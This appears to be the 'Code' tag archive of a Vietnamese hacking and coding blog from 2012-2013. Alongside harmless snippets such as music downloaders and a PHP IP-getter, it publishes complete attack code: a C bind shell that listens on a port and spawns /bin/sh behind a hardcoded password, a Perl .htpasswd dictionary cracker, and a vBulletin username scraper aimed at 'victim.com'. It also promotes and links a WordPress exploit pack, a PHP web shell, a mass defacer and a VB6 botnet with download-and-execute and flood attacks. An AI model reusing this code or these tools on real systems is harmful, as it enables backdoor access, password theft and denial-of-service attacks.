Tải nhạc chất lượng cao 320Kbps, Lossless tại Zing Mp3
Truy cập tại đây: http://code.poly-edu.in/mp3/
Chỉ việc nhập liên kết bài hát các bạn muốn tải. Sau đó chọn chất lượng các bạn muốn (128kbps, 320kbps, Lossless).
READ MORE »
Hiển thị các bài đăng có nhãn Code. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Code. Hiển thị tất cả bài đăng
Thứ Bảy, 27 tháng 7, 2013
Chủ Nhật, 7 tháng 7, 2013
Share code get link nhạc từ SoundCloud
Hình demo:

Link demo: http://code.poly-edu.in/
Rất đơn giản, chỉ việc nhập link soundcloud mà bạn cần download và nhấn Bắt đầu tải.
Code hỗ trợ ajax và sử dụng player để phát trực tuyến.
READ MORE »
Link demo: http://code.poly-edu.in/
Rất đơn giản, chỉ việc nhập link soundcloud mà bạn cần download và nhấn Bắt đầu tải.
Code hỗ trợ ajax và sử dụng player để phát trực tuyến.
READ MORE »
Thứ Ba, 25 tháng 6, 2013
WordPress Xploiter Released by Team Freak Coderz
WordPress Xploiter is free WordPress Vulnerability Scanner. It is the first version of WordPress Xploiter.
This tool contains 251 WordPress Exploit including latest Exploits Till date 28-5-13
Its the Latest Project by the Team Freak CoderzThis tool contains 251 WordPress Exploit including latest Exploits Till date 28-5-13
READ MORE »
How Read Barrecode Or Qr Code Without A Scanner
Did you encounter once QR code and want to read it and you do not have a smart phone? Once you need to know numbers bar code, but you do not have a scanner codes? price that is used in commercial purposes.
Thứ Hai, 6 tháng 5, 2013
5 Cách để học lập trình nhanh hơn – 5 Ways yo
Học lập trình không phải là chuyện mà ta có thể làm trong một sớm, một chiều, nhưng nó không phải là quá khó khăn. Có rất nhiều điều bạn có thể làm cho nó dễ dàng hơn khi bạn học lập trình. Bài viết sau đây được tham khảo từ trang web cprogramming.com sẽ có thể giúp ích cho chúng ta khám phá được những bí quyết để học lập trình tốt hơn và nhanh hơn.
READ MORE »
READ MORE »
Thứ Bảy, 19 tháng 1, 2013
.htpasswd crack exploit
#! /usr/bin/perl
# crack.pl by fwaggle root@fwaggle.net
open (PASSFILE, "senhas");
my @passfile = <PASSFILE>;
close PASSFILE;
open (DICTFILE, "dictionary.txt");
my @dictfile = <DICTFILE>;
close DICTFILE;
foreach $line (@passfile) {
my ($username, $encpass) = split(/:/, $line);
foreach $attempt (@dictfile) {
if ($encpass eq crypt($attempt, $encpass)) {
print("Cracked: ${username}:${attempt}\n");
}
}
}
MadSpot Shell v2 (Released)
This is offical 2nd php shell by Madleets Team
this shell design specially for command line user . you can use Shell as terminal ..you type any command it will show result same as terminal ..
READ MORE »
this shell design specially for command line user . you can use Shell as terminal ..you type any command it will show result same as terminal ..
READ MORE »
Prv8 wordpress and joomla mass defacer
Download:
http://www.mediafire.com/?sftiwmr8szfseb2
Pass: junookyo
Thứ Sáu, 11 tháng 1, 2013
Skydreamer HTML5 responsive vCard
home : http://themeforest.net/item/skydream...-vcard/2950493
demo : http://simplesphere.net/html5/
Skydreamer HTML5 responsive vCard is a simple, minimalistic, clean and easy to set up CSS3 Vcard template. It can be adpated for both personal or commercial (business) use. A great way to showcase your portfolio, Skydreamer HTML5 vCard comes with a unique design, that adapts to different screen sizes with adequate comments all over the theme files and a solid documentation. The template has a unique and impressive look that will satisfy every taste.
Please rate my design so that I can further improve my upcoming themes
READ MORE »
Thứ Ba, 1 tháng 1, 2013
GenXE: Generate Xss Exploit
Description
GenXE: Generate XSS Exploit (tool). Give us a simple cross-site scripting exploit: alert, GenXE generates complex exploit(s) for you.
GenXE Web Site
Download source:
http://sourceforge.net/projects/genxe/files/latest/download
Thứ Sáu, 21 tháng 12, 2012
vBulletin Modifications Collection (ver 3+4)
Tất cả những mod/product do Juno_okyo sưu tập. Đa số đều sử dụng tại: http://www.ghostclub.info/
Các bạn có thể xem demo tại forum đó!
Link: http://www.mediafire.com/?3212u9arb9mio
Các bạn có thể xem demo tại forum đó!
Link: http://www.mediafire.com/?3212u9arb9mio
Thứ Sáu, 7 tháng 12, 2012
[Code] C backconnect
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define ENTERPASS "Nhap mat khau: \0"
#define WELCOME "Welcome to shell\r\nlet's do it:\r\n"
#define PASSWORD "ceh.vn"
int main(int argc, char **argv)
{
struct sockaddr_in c_addr;
struct sockaddr_in s_addr;
char buf[1024];
pid_t pid;
int i,sock_descriptor,temp_sock_descriptor,c_addrsize;
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
if (argc!=2){
printf("=================================\r\n");
printf("|bin.c by pr0cess edit by kai\r\n");
printf("|Usage:\r\n");
printf("|./cehbin 2080\r\n");
printf("|nc -vv targetIP 2080\r\n");
printf("|Nhap mat khau\r\n");
printf("|Chuc may man ;)\r\n");
printf("=================================\r\n");
exit(1);
}
if (fork()){
exit(0);
}
sock_descriptor=socket(AF_INET,SOCK_STREAM,0);
if (socket(AF_INET,SOCK_STREAM,0)==-1){
printf("socket failed!");
exit(1);
}
memset(&s_addr,0,sizeof(s_addr));
//bzero(&s_addr,sizeof(s_addr));
s_addr.sin_family=AF_INET;
s_addr.sin_addr.s_addr=htonl(INADDR_ANY);
s_addr.sin_port=htons(atoi(argv[1]));
if (bind(sock_descriptor,(struct sockaddr *)&s_addr,sizeof(s_addr))==-1){
printf("bind failed!");
exit(1);
}
if (listen(sock_descriptor,20)==-1)//accept 20 connections
{
printf("listen failed!");
exit(1);
}
c_addrsize=sizeof(c_addr);
temp_sock_descriptor=accept(sock_descriptor,(struct sockaddr *)&c_addr,&c_addrsize);
//recv
while(temp_sock_descriptor){
pid=fork();
if (pid>0) {
close(temp_sock_descriptor);
continue;
}else if (pid==0){
write(temp_sock_descriptor, ENTERPASS, strlen(ENTERPASS));
memset(buf, '\0', 1024);
recv(temp_sock_descriptor, buf, 1024, 0);
if (strncmp(buf,PASSWORD,5) !=0){
close(temp_sock_descriptor);
exit(1);
}
write(temp_sock_descriptor, WELCOME, strlen(WELCOME));
dup2(temp_sock_descriptor,0);
dup2(temp_sock_descriptor,1);
dup2(temp_sock_descriptor,2);
execl("/bin/sh", "sh", (char *) 0);
close(temp_sock_descriptor);
exit(0);
}else{
exit(1);
}
}
close(sock_descriptor);
return 0;
}
Thứ Bảy, 1 tháng 12, 2012
CodeXploiter 1.0 - Tìm kiếm các lỗ hổng trong các file PHP
CodeXploiter is a White-Box scanner used for finding vulnerabilities in PHP files. It scans PHP source code files automatically based on selected rules and configurations.
CodeXploiter helps security professionals to highlight possible vulnerabilities in a timely manner by automating the process of source code analysis. As a result this will let security professionals focus more on vulnerability research and exploit development.
CodeXploiter has a user-friendly interface that suits the needs of security professionals and average users who are interested in the field of vulnerability research and exploit development.
CodeXploiter helps security professionals to highlight possible vulnerabilities in a timely manner by automating the process of source code analysis. As a result this will let security professionals focus more on vulnerability research and exploit development.
CodeXploiter has a user-friendly interface that suits the needs of security professionals and average users who are interested in the field of vulnerability research and exploit development.
Thứ Sáu, 30 tháng 11, 2012
Xcode multiple vulnerability Scanner
XCode Exploit – Vulnurable & webshell Scanner help you to gather the dorks Link from Google. then you may check the results if its Vulnurable to exploit with SQL injection commands, LFI,and XSS. And You may hunt the webshells those uploaded.
READ MORE »
Thứ Hai, 26 tháng 11, 2012
Code PHP - lấy địa chỉ IP của người dùng
Code PHP, lấy địa chỉ IP của người dùng, Get Remote IP Address in PHP, get user ip address using php
Đoạn code PHP này sẽ trả về IP đang gửi request tới server.
<?php
function getRemoteIPAddress(){
$ip = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '';
return $ip;
}
/* If your visitor comes from proxy server you have use another function
to get a real IP address: */
function getRealIPAddress(){
if(!empty($_SERVER['HTTP_CLIENT_IP'])){
//check ip from share internet
$ip = $_SERVER['HTTP_CLIENT_IP'];
}else if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){
//to check ip is pass from proxy
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
return $ip;
}
?>
Chủ Nhật, 25 tháng 11, 2012
[OPEN SOURCE] vnLoader - HTTP Bot - DL/Exec, Update, Visit - [UDP | HTTP Flood] [VB6]
Hey guys!
I'm presenting my HTTP Bot called 'vnLoader' i was coding it about 1 year ago for a couple of months. I don't use it anymore so I gonna share this with you.
It only lays around on my computer. So why not giving something to the community.
About the Bot:
- Coded in VB6
- Startup (of course)
- Mutex (of course)
- Copy & Paste UAC Bypass
- Commands:
- Download & Execute
- Update
- Remove
- Visit Website (visible/hidden)
- UDP Flood
> attacks random ports - HTTP Flood
> if server is vulnerable to Slowloris -> Slowloris attack
> else -> HTTP Get Flood
- Uses Sockets to connect!
Thứ Bảy, 24 tháng 11, 2012
Joomla Exploit (Code)
In this video you will learn how to hack joomla
Note:- This exploit only works on old version of joomla
READ MORE »
Thứ Sáu, 23 tháng 11, 2012
[PHP] Get list username - vBulletin
<?php
// GET user
function duyk_get_all_usr($link, $total_usr)
{
$max_page = $total_usr/100;
$max_page = round($max_page);
for($page=1;$page<=$max_page;$page++)
{
$contents = file_get_contents($link.'/memberlist.php?order=asc&sort=username&pp=100&page='.$page);
for($id=1;$id<=100;$id++)
{
$duyk_user .= duyk_tach('<td class="alt1 username">', '<span class="usertitle">', $id, $contents).'</br>';
}
}
return $duyk_user;
}
// Tach
function duyk_tach($dau, $cuoi, $vitri, $noidung)
{
$noidung = explode($dau, $noidung);
$ketqua = explode($cuoi, $noidung[$vitri]);
return $ketqua[0];
}
echo duyk_get_all_usr('http://victim.com/forum', 100); // Thay 100 = tong so usr
?>
Thứ Năm, 22 tháng 11, 2012
Share code get link download MediaFire
<?php
if(isset($_GET['url'])){
$source = file_get_contents($_GET['url']);// Get source html của link mediafire
$dl = explode('kNO = "',$source);// Tách chuỗi để lấy link
$dl = explode('";',$dl[1]); // Kết thúc của chuỗi
header('location: '.$dl[0]); // Dùng hàm header để chuyển tới link download trực tiếp của mediafire
}
?>
Đăng ký:
Bài đăng (Atom)